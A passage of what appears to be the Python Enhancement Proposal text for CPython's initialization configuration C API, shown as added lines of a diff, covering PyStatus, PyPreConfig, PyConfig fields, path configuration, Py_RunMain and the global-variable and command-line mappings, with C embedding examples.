+    }
+    PyMem_RawFree(ptr);   /* allocated with PyMem_RawMalloc() */
+    return 0;
+}
+
+
+

PyStatus fields:

+
    +
  • exitcode (int): +Argument passed to exit().
  • +
  • err_msg (const char*): +Error message.
  • +
  • func (const char *): +Name of the function which created an error, can be NULL.
  • +
  • private _type field: for internal usage only.
  • +
+

Functions to create a status:

+
    +
  • PyStatus_Ok(): Success.
  • +
  • PyStatus_Error(err_msg): Initialization error with a message.
  • +
  • PyStatus_NoMemory(): Memory allocation failure (out of memory).
  • +
  • PyStatus_Exit(exitcode): Exit Python with the specified exit code.
  • +
+

Functions to handle a status:

+
    +
  • PyStatus_Exception(status): Is the result an error or an exit? If true, the exception must be handled, for example by calling Py_ExitStatusException(status).
  • +
  • PyStatus_IsError(status): Is the result an error?
  • +
  • PyStatus_IsExit(status): Is the result an exit?
  • +
  • Py_ExitStatusException(status): Call exit(exitcode) if status is an exit. Print the error message and exit with a non-zero exit code if status is an error. Must only be called if PyStatus_Exception(status) is true. A sketch of handling a status manually follows this list.
  • +
+
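As an illustration, here is a hypothetical handle_status() helper which reports the failure itself instead of letting Py_ExitStatusException() terminate the process (field names are those of the PyStatus structure above):

#include <Python.h>
#include <stdio.h>

/* Hypothetical helper: map a PyStatus to a process exit code,
   reporting errors on stderr instead of terminating the process. */
static int handle_status(PyStatus status)
{
    if (PyStatus_IsExit(status)) {
        return status.exitcode;          /* exit() was requested */
    }
    if (PyStatus_IsError(status)) {
        fprintf(stderr, "Python initialization failed in %s: %s\n",
                status.func != NULL ? status.func : "<unknown>",
                status.err_msg != NULL ? status.err_msg : "<no message>");
        return 1;
    }
    return 0;   /* success: PyStatus_Exception() is false */
}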
+

Note

+

Internally, Python uses macros which set PyStatus.func, +whereas functions to create a status set func to NULL.

+
+
+
+

Preinitialization with PyPreConfig

+

The PyPreConfig structure is used to preinitialize Python:

+
    +
  • Set the Python memory allocator
  • +
  • Configure the LC_CTYPE locale
  • +
  • Set the UTF-8 mode
  • +
+

Example using the preinitialization to enable the UTF-8 Mode:

+
PyStatus status;
+PyPreConfig preconfig;
+
+PyPreConfig_InitPythonConfig(&preconfig);
+
+preconfig.utf8_mode = 1;
+
+status = Py_PreInitialize(&preconfig);
+if (PyStatus_Exception(status)) {
+    Py_ExitStatusException(status);
+}
+
+/* at this point, Python will speak UTF-8 */
+
+Py_Initialize();
+/* ... use Python API here ... */
+Py_Finalize();
+
+
+

Function to initialize a preconfiguration:

+
    +
  • PyStatus PyPreConfig_InitIsolatedConfig(PyPreConfig *preconfig)
  • +
  • PyStatus PyPreConfig_InitPythonConfig(PyPreConfig *preconfig)
  • +
+

Functions to preinitialize Python:

+
    +
  • PyStatus Py_PreInitialize(const PyPreConfig *preconfig)
  • +
  • PyStatus Py_PreInitializeFromBytesArgs(const PyPreConfig *preconfig, int argc, char * const *argv)
  • +
  • PyStatus Py_PreInitializeFromArgs(const PyPreConfig *preconfig, int argc, wchar_t * const * argv)
  • +
+

The caller is responsible for handling exceptions (error or exit) using PyStatus_Exception() and Py_ExitStatusException().

+

For the Python Configuration (PyPreConfig_InitPythonConfig()), if Python is initialized with command line arguments, the command line arguments must also be passed to preinitialize Python, since they have an effect on the pre-configuration, such as the encodings. For example, the -X utf8 command line option enables the UTF-8 Mode.
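For example, a sketch (assuming argc and argv come straight from main()) letting options like -X utf8 influence the pre-configuration:

PyStatus status;
PyPreConfig preconfig;

PyPreConfig_InitPythonConfig(&preconfig);

/* Pass the bytes argv of main() so that options such as
   -X utf8 are taken into account during preinitialization. */
status = Py_PreInitializeFromBytesArgs(&preconfig, argc, argv);
if (PyStatus_Exception(status)) {
    Py_ExitStatusException(status);
}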

+

PyPreConfig fields:

+
    +
  • allocator (int): +Name of the memory allocator (ex: PYMEM_ALLOCATOR_MALLOC). Valid +values:
      +
    • PYMEM_ALLOCATOR_NOT_SET (0): don’t change memory allocators +(use defaults)
    • +
    • PYMEM_ALLOCATOR_DEFAULT (1): default memory allocators
    • +
    • PYMEM_ALLOCATOR_DEBUG (2): default memory allocators with +debug hooks
    • +
    • PYMEM_ALLOCATOR_MALLOC (3): force usage of malloc()
    • +
    • PYMEM_ALLOCATOR_MALLOC_DEBUG (4): force usage of +malloc() with debug hooks
    • +
    • PYMEM_ALLOCATOR_PYMALLOC (5): Python “pymalloc” allocator
    • +
    • PYMEM_ALLOCATOR_PYMALLOC_DEBUG (6): Python “pymalloc” +allocator with debug hooks
    • +
    • Note: PYMEM_ALLOCATOR_PYMALLOC and +PYMEM_ALLOCATOR_PYMALLOC_DEBUG are not supported if Python is +configured using --without-pymalloc
    • +
    +
  • +
  • configure_locale (int): Set the LC_CTYPE locale to the user preferred locale? If equal to 0, set coerce_c_locale and coerce_c_locale_warn to 0.
  • +
  • coerce_c_locale (int): If equal to 2, coerce the C locale; if equal to 1, read the LC_CTYPE locale to decide if it should be coerced.
  • +
  • coerce_c_locale_warn (int): +If non-zero, emit a warning if the C locale is coerced.
  • +
  • dev_mode (int): +See PyConfig.dev_mode.
  • +
  • isolated (int): +See PyConfig.isolated.
  • +
  • legacy_windows_fs_encoding (int, Windows only): +If non-zero, disable UTF-8 Mode, set the Python filesystem encoding to +mbcs, set the filesystem error handler to replace.
  • +
  • parse_argv (int): +If non-zero, Py_PreInitializeFromArgs() and +Py_PreInitializeFromBytesArgs() parse their argv argument the +same way the regular Python parses command line arguments: see +Command Line Arguments.
  • +
  • use_environment (int): +See PyConfig.use_environment.
  • +
  • utf8_mode (int): +If non-zero, enable the UTF-8 mode.
  • +
+

The legacy_windows_fs_encoding field is only available on Windows. The #ifdef MS_WINDOWS macro can be used for Windows specific code.

+

PyPreConfig private fields, for internal use only:

+
    +
  • _config_init (int): +Function used to initialize PyConfig, used for preinitialization.
  • +
+

PyMem_SetAllocator() can be called after Py_PreInitialize() and +before Py_InitializeFromConfig() to install a custom memory +allocator. It can be called before Py_PreInitialize() if +allocator is set to PYMEM_ALLOCATOR_NOT_SET (default value).
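A sketch (all names are illustrative) of a counting raw-domain allocator installed between the two phases:

#include <Python.h>
#include <stdlib.h>

static size_t raw_allocations = 0;   /* illustrative statistic */

static void *count_malloc(void *ctx, size_t size)
{
    size_t *counter = (size_t *)ctx;
    (*counter)++;
    /* CPython requires a non-NULL result for a zero-byte request */
    return malloc(size != 0 ? size : 1);
}

static void *count_calloc(void *ctx, size_t nelem, size_t elsize)
{
    size_t *counter = (size_t *)ctx;
    (*counter)++;
    if (nelem == 0 || elsize == 0) {
        nelem = 1;
        elsize = 1;
    }
    return calloc(nelem, elsize);
}

static void *count_realloc(void *ctx, void *ptr, size_t size)
{
    return realloc(ptr, size != 0 ? size : 1);
}

static void count_free(void *ctx, void *ptr)
{
    free(ptr);
}

/* Call after Py_PreInitialize() succeeded and before
   Py_InitializeFromConfig(). */
static void install_counting_allocator(void)
{
    PyMemAllocatorEx alloc = {
        &raw_allocations,    /* ctx */
        count_malloc,
        count_calloc,
        count_realloc,
        count_free,
    };
    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
}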

+

Python memory allocation functions like PyMem_RawMalloc() must not +be used before Python preinitialization, whereas calling directly +malloc() and free() is always safe. Py_DecodeLocale() must +not be called before the preinitialization.

+
+
+

Initialization with PyConfig

+

The PyConfig structure contains most parameters to configure Python.

+

Example setting the program name:

+
void init_python(void)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    /* Set the program name. Implicitly preinitialize Python. */
+    status = PyConfig_SetString(&config, &config.program_name,
+                                L"/path/to/my_program");
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+
+    status = Py_InitializeFromConfig(&config);
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+    PyConfig_Clear(&config);
+    return;
+
+fail:
+    PyConfig_Clear(&config);
+    Py_ExitStatusException(status);
+}
+
+
+

PyConfig methods:

+
    +
  • void PyConfig_InitPythonConfig(PyConfig *config): Initialize configuration with the Python Configuration.
  • +
  • void PyConfig_InitIsolatedConfig(PyConfig *config): +Initialize configuration with Isolated Configuration.
  • +
  • PyStatus PyConfig_SetString(PyConfig *config, wchar_t * const *config_str, const wchar_t *str): +Copy the wide character string str into *config_str. +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_SetBytesString(PyConfig *config, wchar_t * const *config_str, const char *str): +Decode str using Py_DecodeLocale() and set the result into +*config_str. +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_SetArgv(PyConfig *config, int argc, wchar_t * const *argv): +Set command line arguments from wide character strings. +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_SetBytesArgv(PyConfig *config, int argc, char * const *argv): +Set command line arguments: decode bytes using Py_DecodeLocale(). +Preinitialize Python if needed.
  • +
  • PyStatus PyConfig_Read(PyConfig *config): +Read all Python configuration. Fields which are already initialized +are left unchanged. +Preinitialize Python if needed.
  • +
  • void PyConfig_Clear(PyConfig *config): +Release configuration memory.
  • +
+

Most PyConfig methods preinitialize Python if needed. In that case, the Python preinitialization configuration is based on the PyConfig. If configuration fields which are in common with PyPreConfig are tuned, they must be set before calling a PyConfig method:

+
    +
  • dev_mode
  • +
  • isolated
  • +
  • parse_argv
  • +
  • use_environment
  • +
+

Moreover, if PyConfig_SetArgv() or PyConfig_SetBytesArgv() is +used, this method must be called first, before other methods, since the +preinitialization configuration depends on command line arguments (if +parse_argv is non-zero).
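A sketch respecting both rules (argc and argv are assumed to come from main(); the program name is illustrative): shared fields are set first, PyConfig_SetBytesArgv() comes before any other method, and the remaining methods follow:

static void init_python(int argc, char **argv)
{
    PyStatus status;
    PyConfig config;
    PyConfig_InitPythonConfig(&config);

    /* 1. Fields shared with PyPreConfig must be set before
          calling any PyConfig method. */
    config.dev_mode = 1;

    /* 2. argv first among the methods: this call implicitly
          preinitializes Python from the command line arguments. */
    status = PyConfig_SetBytesArgv(&config, argc, argv);
    if (PyStatus_Exception(status)) {
        goto fail;
    }

    /* 3. Any other method can now follow. */
    status = PyConfig_SetString(&config, &config.program_name,
                                L"my_app");   /* illustrative */
    if (PyStatus_Exception(status)) {
        goto fail;
    }

    status = Py_InitializeFromConfig(&config);
    if (PyStatus_Exception(status)) {
        goto fail;
    }
    PyConfig_Clear(&config);
    return;

fail:
    PyConfig_Clear(&config);
    Py_ExitStatusException(status);
}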

+

Functions to initialize Python:

+
    +
  • PyStatus Py_InitializeFromConfig(const PyConfig *config): +Initialize Python from config configuration.
  • +
+

The caller of these methods and functions is responsible for handling exceptions (error or exit) using PyStatus_Exception() and Py_ExitStatusException().

+

PyConfig fields:

+
    +
  • argv (PyWideStringList): +Command line arguments, sys.argv. See parse_argv to parse +argv the same way the regular Python parses Python command line +arguments. If argv is empty, an empty string is added to ensure +that sys.argv always exists and is never empty.
  • +
  • base_exec_prefix (wchar_t*): +sys.base_exec_prefix.
  • +
  • base_prefix (wchar_t*): +sys.base_prefix.
  • +
  • buffered_stdio (int): If equal to 0, enable unbuffered mode, making the stdout and stderr streams unbuffered.
  • +
  • bytes_warning (int): If equal to 1, issue a warning when comparing bytes or bytearray with str, or comparing bytes with int. If equal to or greater than 2, raise a BytesWarning exception.
  • +
  • check_hash_pycs_mode (wchar_t*): +--check-hash-based-pycs command line option value (see PEP 552). +Valid values: always, never and default. The default value +is default.
  • +
  • configure_c_stdio (int): If non-zero, configure the C standard streams (stdin, stdout, stderr). For example, set their mode to O_BINARY on Windows.
  • +
  • dev_mode (int): +Development mode
  • +
  • dump_refs (int): If non-zero, dump all objects which are still alive at exit. Requires a special Python build with the Py_REF_DEBUG macro defined.
  • +
  • exec_prefix (wchar_t*): +sys.exec_prefix.
  • +
  • executable (wchar_t*): +sys.executable.
  • +
  • faulthandler (int): +If non-zero, call faulthandler.enable().
  • +
  • filesystem_encoding (wchar_t*): +Filesystem encoding, sys.getfilesystemencoding().
  • +
  • filesystem_errors (wchar_t*): +Filesystem encoding errors, sys.getfilesystemencodeerrors().
  • +
  • use_hash_seed (int), +hash_seed (unsigned long): +Randomized hash function seed.
  • +
  • home (wchar_t*): +Python home directory.
  • +
  • import_time (int): +If non-zero, profile import time.
  • +
  • inspect (int): +Enter interactive mode after executing a script or a command.
  • +
  • install_signal_handlers (int): +Install signal handlers?
  • +
  • interactive (int): +Interactive mode.
  • +
  • isolated (int): +If greater than 0, enable isolated mode:
      +
    • sys.path contains neither the script’s directory (computed from +argv[0] or the current directory) nor the user’s site-packages +directory.
    • +
    • Python REPL doesn’t import readline nor enable default readline +configuration on interactive prompts.
    • +
    • Set use_environment and user_site_directory to 0.
    • +
    +
  • +
  • legacy_windows_stdio (int, Windows only): +If non-zero, use io.FileIO instead of WindowsConsoleIO for +sys.stdin, sys.stdout and sys.stderr.
  • +
  • malloc_stats (int): +If non-zero, dump statistics on pymalloc memory allocator at exit. +The option is ignored if Python is built using --without-pymalloc.
  • +
  • pythonpath_env (wchar_t*): +Module search paths as a string separated by DELIM (usually : +character). +Initialized from PYTHONPATH environment variable value by default.
  • +
  • module_search_paths_set (int), +module_search_paths (PyWideStringList): +sys.path. If module_search_paths_set is equal to 0, the +module_search_paths is overridden by the function computing the +Path Configuration.
  • +
  • optimization_level (int): +Compilation optimization level:
      +
    • 0: Peephole optimizer (and __debug__ is set to True)
    • +
    • 1: Remove assertions, set __debug__ to False
    • +
    • 2: Strip docstrings
    • +
    +
  • +
  • parse_argv (int): If non-zero, parse argv the same way the regular Python parses command line arguments, and strip Python arguments from argv: see Command Line Arguments.
  • +
  • parser_debug (int): +If non-zero, turn on parser debugging output (for expert only, +depending on compilation options).
  • +
  • pathconfig_warnings (int): +If equal to 0, suppress warnings when computing the path +configuration (Unix only, Windows does not log any warning). Otherwise, +warnings are written into stderr.
  • +
  • prefix (wchar_t*): +sys.prefix.
  • +
  • program_name (wchar_t*): +Program name.
  • +
  • pycache_prefix (wchar_t*): +.pyc cache prefix.
  • +
  • quiet (int): +Quiet mode. For example, don’t display the copyright and version +messages even in interactive mode.
  • +
  • run_command (wchar_t*): +python3 -c COMMAND argument.
  • +
  • run_filename (wchar_t*): +python3 FILENAME argument.
  • +
  • run_module (wchar_t*): +python3 -m MODULE argument.
  • +
  • show_alloc_count (int): Show allocation counts at exit? Needs a special Python build with the COUNT_ALLOCS macro defined.
  • +
  • show_ref_count (int): Show the total reference count at exit? Needs a debug build of Python (the Py_REF_DEBUG macro should be defined).
  • +
  • site_import (int): +Import the site module at startup?
  • +
  • skip_source_first_line (int): +Skip the first line of the source?
  • +
  • stdio_encoding (wchar_t*), +stdio_errors (wchar_t*): +Encoding and encoding errors of sys.stdin, sys.stdout +and sys.stderr.
  • +
  • tracemalloc (int): +If non-zero, call tracemalloc.start(value).
  • +
  • user_site_directory (int): +If non-zero, add user site directory to sys.path.
  • +
  • verbose (int): +If non-zero, enable verbose mode.
  • +
  • warnoptions (PyWideStringList): +Options of the warnings module to build warnings filters.
  • +
  • write_bytecode (int): +If non-zero, write .pyc files.
  • +
  • xoptions (PyWideStringList): +sys._xoptions.
  • +
+

The legacy_windows_stdio field is only available on Windows. The #ifdef MS_WINDOWS macro can be used for Windows specific code.

+

If parse_argv is non-zero, argv arguments are parsed the same +way the regular Python parses command line arguments, and Python +arguments are stripped from argv: see Command Line Arguments.

+

The xoptions options are parsed to set other options: see -X +Options.

+

PyConfig private fields, for internal use only:

+
    +
  • _config_init (int): +Function used to initialize PyConfig, used for preinitialization.
  • +
  • _install_importlib (int): +Install importlib?
  • +
  • _init_main (int): +If equal to 0, stop Python initialization before the “main” phase +(see PEP 432).
  • +
+

A more complete example that modifies the default configuration, reads the configuration, and then overrides some parameters:

+
PyStatus init_python(const char *program_name)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    /* Set the program name before reading the configuration
+       (decode byte string from the locale encoding).
+
+       Implicitly preinitialize Python. */
+    status = PyConfig_SetBytesString(&config, &config.program_name,
+                                  program_name);
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    /* Read all configuration at once */
+    status = PyConfig_Read(&config);
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    /* Append our custom search path to sys.path */
+    status = PyWideStringList_Append(&config.module_search_paths,
+                                  L"/path/to/more/modules");
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    /* Override executable computed by PyConfig_Read() */
+    status = PyConfig_SetString(&config, &config.executable,
+                                L"/path/to/my_executable");
+    if (PyStatus_Exception(status)) {
+        goto done;
+    }
+
+    status = Py_InitializeFromConfig(&config);
+
+done:
+    PyConfig_Clear(&config);
+    return status;
+}
+
+
+
+

Note

+

The PyImport_FrozenModules variable and the PyImport_AppendInittab() and PyImport_ExtendInittab() functions are still relevant and continue to work as before. They should be set or called after Python preinitialization and before Python initialization, as in the sketch below.
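For example, a sketch (the emb module and its contents are hypothetical) registering a built-in extension module between the two phases:

static PyObject *emb_ping(PyObject *self, PyObject *args)
{
    return PyUnicode_FromString("pong");
}

static PyMethodDef emb_methods[] = {
    {"ping", emb_ping, METH_NOARGS, "Return 'pong'."},
    {NULL, NULL, 0, NULL}
};

static struct PyModuleDef emb_module = {
    PyModuleDef_HEAD_INIT, "emb", NULL, -1, emb_methods,
    NULL, NULL, NULL, NULL
};

static PyObject *PyInit_emb(void)
{
    return PyModule_Create(&emb_module);
}

/* After Py_PreInitialize() and before Py_InitializeFromConfig(): */
if (PyImport_AppendInittab("emb", &PyInit_emb) == -1) {
    fprintf(stderr, "could not extend the builtin modules table\n");
    exit(1);
}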

+
+
+
+

Isolated Configuration

+

PyPreConfig_InitIsolatedConfig() and PyConfig_InitIsolatedConfig() functions create a configuration to isolate Python from the system, for example to embed Python into an application.

+

This configuration ignores global configuration variables, environment variables and command line arguments (argv is not parsed). The C standard streams (ex: stdout) and the LC_CTYPE locale are left unchanged by default.

+

Configuration files are still used with this configuration. Set the Path Configuration ("output fields") explicitly to ignore these configuration files and to avoid the function computing the default path configuration, as in the sketch below.
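A sketch (all paths are illustrative) setting every path output field so that neither the configuration files nor the default path computation are used:

PyStatus init_isolated(void)
{
    PyStatus status;
    PyConfig config;
    PyConfig_InitIsolatedConfig(&config);

    /* Setting every path "output field" makes Python skip both
       the path computation and the configuration files. */
    status = PyConfig_SetString(&config, &config.executable,
                                L"/opt/app/bin/app");
    if (PyStatus_Exception(status)) goto done;

    status = PyConfig_SetString(&config, &config.prefix, L"/opt/app");
    if (PyStatus_Exception(status)) goto done;

    status = PyConfig_SetString(&config, &config.exec_prefix,
                                L"/opt/app");
    if (PyStatus_Exception(status)) goto done;

    status = PyWideStringList_Append(&config.module_search_paths,
                                     L"/opt/app/lib/python");
    if (PyStatus_Exception(status)) goto done;
    config.module_search_paths_set = 1;

    status = Py_InitializeFromConfig(&config);

done:
    PyConfig_Clear(&config);
    return status;
}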

+
+
+

Python Configuration

+

PyPreConfig_InitPythonConfig() and PyConfig_InitPythonConfig() functions create a configuration to build a customized Python which behaves like the regular Python.

+

Environment variables and command line arguments are used to configure Python, whereas global configuration variables are ignored.

+

These functions enable C locale coercion (PEP 538) and the UTF-8 Mode (PEP 540) depending on the LC_CTYPE locale and the PYTHONUTF8 and PYTHONCOERCECLOCALE environment variables.

+

Example of customized Python always running in isolated mode:

+
int main(int argc, char **argv)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    config.isolated = 1;
+
+    /* Decode command line arguments.
+       Implicitly preinitialize Python (in isolated mode). */
+    status = PyConfig_SetBytesArgv(&config, argc, argv);
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+
+    status = Py_InitializeFromConfig(&config);
+    if (PyStatus_Exception(status)) {
+        goto fail;
+    }
+    PyConfig_Clear(&config);
+
+    return Py_RunMain();
+
+fail:
+    PyConfig_Clear(&config);
+    if (PyStatus_IsExit(status)) {
+        return status.exitcode;
+    }
+    /* Display the error message and exit the process with
+       non-zero exit code */
+    Py_ExitStatusException(status);
+}
+
+
+

This example is a basic implementation of the “System Python Executable” +discussed in PEP 432.

+
+
+

Path Configuration

+

PyConfig contains multiple fields for the path configuration:

+
    +
  • Path configuration input fields:
      +
    • home
    • +
    • pythonpath_env
    • +
    • pathconfig_warnings
    • +
    +
  • +
  • Path configuration output fields:
      +
    • exec_prefix
    • +
    • executable
    • +
    • prefix
    • +
    • module_search_paths_set, module_search_paths
    • +
    +
  • +
+

If at least one “output field” is not set, Python computes the path +configuration to fill unset fields. If module_search_paths_set is +equal to 0, module_search_paths is overridden and +module_search_paths_set is set to 1.

+

It is possible to completely ignore the function computing the default path configuration by explicitly setting all path configuration output fields listed above. A string is considered as set even if it is empty. module_search_paths is considered as set if module_search_paths_set is set to 1. In this case, path configuration input fields are ignored as well.

+

Set pathconfig_warnings to 0 to suppress warnings when computing the +path configuration (Unix only, Windows does not log any warning).

+

If base_prefix or base_exec_prefix fields are not set, they +inherit their value from prefix and exec_prefix respectively.

+

Py_RunMain() and Py_Main() modify sys.path:

+
    +
  • If run_filename is set and is a directory which contains a +__main__.py script, prepend run_filename to sys.path.
  • +
  • If isolated is zero:
      +
    • If run_module is set, prepend the current directory to +sys.path. Do nothing if the current directory cannot be read.
    • +
    • If run_filename is set, prepend the directory of the filename to sys.path.
    • +
    • Otherwise, prepend an empty string to sys.path.
    • +
    +
  • +
+

If site_import is non-zero, sys.path can be modified by the site module. If user_site_directory is non-zero and the user's site-packages directory exists, the site module appends the user's site-packages directory to sys.path.

+

See also Configuration Files used by the path configuration.

+
+
+

Py_BytesMain()

+

Python 3.7 provides a high-level Py_Main() function which requires passing command line arguments as wchar_t* strings. It is non-trivial to use the correct encoding to decode bytes. Python has its own set of issues with C locale coercion and UTF-8 Mode.

+

This PEP adds a new Py_BytesMain() function which takes command line +arguments as bytes:

+
int Py_BytesMain(int argc, char **argv);
+
+
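With it, a program reproducing the regular python3 behavior can be this short (a sketch assuming a standard embedding build):

#include <Python.h>

int main(int argc, char **argv)
{
    /* Decoding of argv and full initialization are handled
       by Python itself. */
    return Py_BytesMain(argc, argv);
}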
+
+
+

Py_RunMain()

+

The new Py_RunMain() function executes the command +(PyConfig.run_command), the script (PyConfig.run_filename) or +the module (PyConfig.run_module) specified on the command line or in +the configuration, and then finalizes Python. It returns an exit status +that can be passed to the exit() function.

+
int Py_RunMain(void);
+
+
+

See Python Configuration for an example of customized Python always +running in isolated mode using Py_RunMain().

+
+
+

Multi-Phase Initialization Private Provisional API

+

This section describes a private provisional API introducing multi-phase initialization, the core feature of PEP 432:

+
    +
  • “Core” initialization phase, “bare minimum Python”:
      +
    • Builtin types;
    • +
    • Builtin exceptions;
    • +
    • Builtin and frozen modules;
    • +
    • The sys module is only partially initialized +(ex: sys.path doesn’t exist yet);
    • +
    +
  • +
  • “Main” initialization phase, Python is fully initialized:
      +
    • Install and configure importlib;
    • +
    • Apply the Path Configuration;
    • +
    • Install signal handlers;
    • +
    • Finish sys module initialization (ex: create sys.stdout and +sys.path);
    • +
    • Enable optional features like faulthandler and tracemalloc;
    • +
    • Import the site module;
    • +
    • etc.
    • +
    +
  • +
+

Private provisional API:

+
    +
  • PyConfig._init_main: if set to 0, Py_InitializeFromConfig() +stops at the “Core” initialization phase.
  • +
  • PyStatus _Py_InitializeMain(void): move to the “Main” +initialization phase, finish the Python initialization.
  • +
+

No module is imported during the "Core" phase and the importlib module is not configured: the Path Configuration is only applied during the "Main" phase. This may make it possible to customize Python in Python, to override or tune the Path Configuration, perhaps install a custom sys.meta_path importer or an import hook, etc.

+

It may become possible to compute the Path Configuration in Python, after the Core phase and before the Main phase, which is one of the PEP 432 motivations.

+

The “Core” phase is not properly defined: what should be and what should +not be available at this phase is not specified yet. The API is marked +as private and provisional: the API can be modified or even be removed +anytime until a proper public API is designed.

+

Example running Python code between “Core” and “Main” initialization +phases:

+
void init_python(void)
+{
+    PyStatus status;
+
+    PyConfig config;
+    PyConfig_InitPythonConfig(&config);
+
+    config._init_main = 0;
+
+    /* ... customize 'config' configuration ... */
+
+    status = Py_InitializeFromConfig(&config);
+    PyConfig_Clear(&config);
+    if (PyStatus_Exception(status)) {
+        Py_ExitStatusException(status);
+    }
+
+    /* Use sys.stderr because sys.stdout is only created
+       by _Py_InitializeMain() */
+    int res = PyRun_SimpleString(
+        "import sys; "
+        "print('Run Python code before _Py_InitializeMain', "
+               "file=sys.stderr)");
+    if (res < 0) {
+        exit(1);
+    }
+
+    /* ... put more configuration code here ... */
+
+    status = _Py_InitializeMain();
+    if (PyStatus_Exception(status)) {
+        Py_ExitStatusException(status);
+    }
+}
+
+
+
+
+
+

Backwards Compatibility

+

This PEP only adds a new API: it leaves the existing API unchanged and has no impact on backwards compatibility.

+

The Python 3.7 Py_Initialize() function now disables the C locale coercion (PEP 538) and the UTF-8 Mode (PEP 540) by default to prevent mojibake. The new API using the Python Configuration is needed to enable them automatically.

+
+
+

Annexes

+
+

Comparison of Python and Isolated Configurations

+

Differences between PyPreConfig_InitPythonConfig() +and PyPreConfig_InitIsolatedConfig():

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PyPreConfig                  | Python | Isolated
coerce_c_locale_warn         | -1     | 0
coerce_c_locale              | -1     | 0
configure_locale             | 1      | 0
dev_mode                     | -1     | 0
isolated                     | 0      | 1
legacy_windows_fs_encoding   | -1     | 0
use_environment              | 0      | 0
parse_argv                   | 1      | 0
utf8_mode                    | -1     | 0
+

Differences between PyConfig_InitPythonConfig() +and PyConfig_InitIsolatedConfig():

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PyConfig                 | Python | Isolated
configure_c_stdio        | 1      | 0
install_signal_handlers  | 1      | 0
isolated                 | 0      | 1
parse_argv               | 1      | 0
pathconfig_warnings      | 1      | 0
use_environment          | 1      | 0
user_site_directory      | 1      | 0
+
+
+

Priority and Rules

+

Priority of configuration parameters, highest to lowest:

+
    +
  • PyConfig
  • +
  • PyPreConfig
  • +
  • Configuration files
  • +
  • Command line options
  • +
  • Environment variables
  • +
  • Global configuration variables
  • +
+

Priority of warning options, highest to lowest:

+
    +
  • PyConfig.warnoptions
  • +
  • PySys_AddWarnOption()
  • +
  • PyConfig.bytes_warning (add the "error::BytesWarning" filter if greater than 1, add the "default::BytesWarning" filter if equal to 1)
  • +
  • -W opt command line argument
  • +
  • PYTHONWARNINGS environment variable
  • +
  • PyConfig.dev_mode (add "default" filter)
  • +
+

Rules on PyConfig parameters:

+
    +
  • If isolated is non-zero, use_environment and +user_site_directory are set to 0.
  • +
  • If dev_mode is non-zero, allocator is set to "debug", faulthandler is set to 1, and the "default" filter is added to warnoptions. But the PYTHONMALLOC environment variable has priority over dev_mode to set the memory allocator.
  • +
  • If base_prefix is not set, it inherits prefix value.
  • +
  • If base_exec_prefix is not set, it inherits exec_prefix value.
  • +
  • If the python._pth configuration file is present, isolated is set to 1 and site_import is set to 0; but site_import is set to 1 if python._pth contains import site (see the sketch after this list).
  • +
+
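For illustration, a hypothetical python._pth placed next to the interpreter executable: each non-comment line is a path entry (relative to the file) added to sys.path, and the import site line turns site_import back on:

# hypothetical python._pth (lines beginning with '#' are comments)
python38.zip
.
import site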

Rules on PyConfig and PyPreConfig parameters:

+
    +
  • If PyPreConfig.legacy_windows_fs_encoding is non-zero, +set PyPreConfig.utf8_mode to 0, set +PyConfig.filesystem_encoding to mbcs, and set +PyConfig.filesystem_errors to replace.
  • +
+
+
+

Configuration Files

+

Python configuration files used by the Path Configuration:

+
    +
  • pyvenv.cfg
  • +
  • python._pth (Windows only)
  • +
  • pybuilddir.txt (Unix only)
  • +
+
+
+

Global Configuration Variables

+

Global configuration variables mapped to PyPreConfig fields:

+ + + + + + + + + + + + + + + + + + + + +
Variable                        | Field
Py_IgnoreEnvironmentFlag        | use_environment (NOT)
Py_IsolatedFlag                 | isolated
Py_LegacyWindowsFSEncodingFlag  | legacy_windows_fs_encoding
Py_UTF8Mode                     | utf8_mode
+

(NOT) means that the PyPreConfig value is the opposite of the global +configuration variable value. Py_LegacyWindowsFSEncodingFlag is only +available on Windows.

+

Global configuration variables mapped to PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Variable                              | Field
Py_BytesWarningFlag                   | bytes_warning
Py_DebugFlag                          | parser_debug
Py_DontWriteBytecodeFlag              | write_bytecode (NOT)
Py_FileSystemDefaultEncodeErrors      | filesystem_errors
Py_FileSystemDefaultEncoding          | filesystem_encoding
Py_FrozenFlag                         | pathconfig_warnings (NOT)
Py_HasFileSystemDefaultEncoding       | filesystem_encoding
Py_HashRandomizationFlag              | use_hash_seed, hash_seed
Py_IgnoreEnvironmentFlag              | use_environment (NOT)
Py_InspectFlag                        | inspect
Py_InteractiveFlag                    | interactive
Py_IsolatedFlag                       | isolated
Py_LegacyWindowsStdioFlag             | legacy_windows_stdio
Py_NoSiteFlag                         | site_import (NOT)
Py_NoUserSiteDirectory                | user_site_directory (NOT)
Py_OptimizeFlag                       | optimization_level
Py_QuietFlag                          | quiet
Py_UnbufferedStdioFlag                | buffered_stdio (NOT)
Py_VerboseFlag                        | verbose
_Py_HasFileSystemDefaultEncodeErrors  | filesystem_errors
+

(NOT) means that the PyConfig value is the opposite of the global +configuration variable value. Py_LegacyWindowsStdioFlag is only +available on Windows.

+
+
+

Command Line Arguments

+

Usage:

+
python3 [options]
+python3 [options] -c COMMAND
+python3 [options] -m MODULE
+python3 [options] SCRIPT
+
+
+

Command line options mapped to pseudo-action on PyPreConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + +
Option        | PyPreConfig field
-E            | use_environment = 0
-I            | isolated = 1
-X dev        | dev_mode = 1
-X utf8       | utf8_mode = 1
